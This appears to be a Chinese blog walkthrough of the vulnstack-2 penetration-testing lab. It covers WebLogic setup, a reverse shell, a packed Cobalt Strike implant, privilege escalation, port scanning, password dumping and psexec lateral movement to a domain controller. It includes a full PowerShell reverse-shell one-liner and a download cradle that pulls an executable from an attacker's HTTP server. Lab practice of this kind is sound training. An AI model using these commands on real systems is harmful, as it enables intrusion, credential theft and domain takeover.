首页 > 其他分享 >vulnstack-2

vulnstack-2

时间:2024-11-27 10:34:06浏览次数:6  
标签:shell stream bytes 192.168 vulnstack sendbyte cs

配置

仅主机模式

nat


打开WEB

密码1qaz@WSX

提示密码过期修改admiN@123

登陆之后打开

C:\Oracle\Middleware\user_projects\domains\base_domain\bin

以管理员身份运行startweblogic

查看192.168.111.80:7001

打靶

反弹shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.111.0', 4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

tasklist /svc

有360

上线cs加壳木马

python启动http临时服务

在反弹的shell上执行以下命令 下载

powershell iex(new-object system.net.webclient).downloadfile('http://192.168.111.0:8000/cs-k.exe','c:\programdata\cs-k.exe')

卡死了再反弹一下

./cs-k.exe

插件提权

shell ipconfig /all
portscan 10.10.10.80/24 1-1024,3389,5000-6000 arp 1024 /扫描端口

开放445端口

尝试横移

建立smb监听

抓取明文密码

横移域控10,使用psexec-64

201,使用psexec

横移成功

标签:shell,stream,bytes,192.168,vulnstack,sendbyte,cs
From: https://blog.csdn.net/m0_64921834/article/details/144076160

相关文章

  • vulnstack1靶场学习
    描述红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线......
  • 红日安全vulnstack (一)
    “感谢您阅读本篇博客!如果您觉得本文对您有所帮助或启发,请不吝点赞和分享给更多的朋友。您的支持是我持续创作的动力,也欢迎留言交流,让我们一起探讨技术,共同成长!谢谢!......
  • 红日安全vulnstack (一)
    网络拓扑图靶机参考文章CS/MSF派发shell环境搭建IP搭建教程本机双网卡65网段和83网段是自己本机电脑(虚拟机)中的网卡,靶机外网的IP需要借助我们这两个网段之一出网KaliIPkali地址网络适配器选择,为VMnetNAT模式会通过DHCP自动获取IP,本机65网卡会自动分配IP和靶机win7同网段......
  • vulnstack2靶场记录
    内网渗透:Vulnstack2靶场记录环境配置web机恢复快照至v1.3在VMWare上开一张新的虚拟网卡,网段为10.10.10.0/24检测连通性:在192.168.208.0/24网段下,Kali一开始死活ping不通web和PC,解决方案:允许防火墙进行ICMP回显netshfirewallseticmpsetting8:允许被ping关闭手......
  • vulnstack1 红日靶场渗透详解
    目录环境搭建信息收集PhpMyAdmin后台GetshellintooutfileMysql日志文件写入shellCS后渗透MSF后渗透知识补充nmap参数分类参数速查表dirsearch环境搭建ip段设置kali(coleak):192.168.145.139Windows7(stu1):192.168.10.181、192.168.145.140Winserver2008(owa):192.168.1......
  • vulnstack1 靶场做题笔记
    一、环境部署1.1靶场下载下载靶场(win7+win2003+win2008),下载攻击机kalilinux下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/靶机通用密码:hongrisec@2019(密码策略原因登录后都会进行修改),这里我改成hongrisec@20231.2网卡配置环境分析:winserver2008图......
  • VulnStack复现
    靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/01.靶场环境攻击机:kali(192.168.232.130)靶机:windows7(外网:192.168.232.155,内网:192.168.52.143)   ......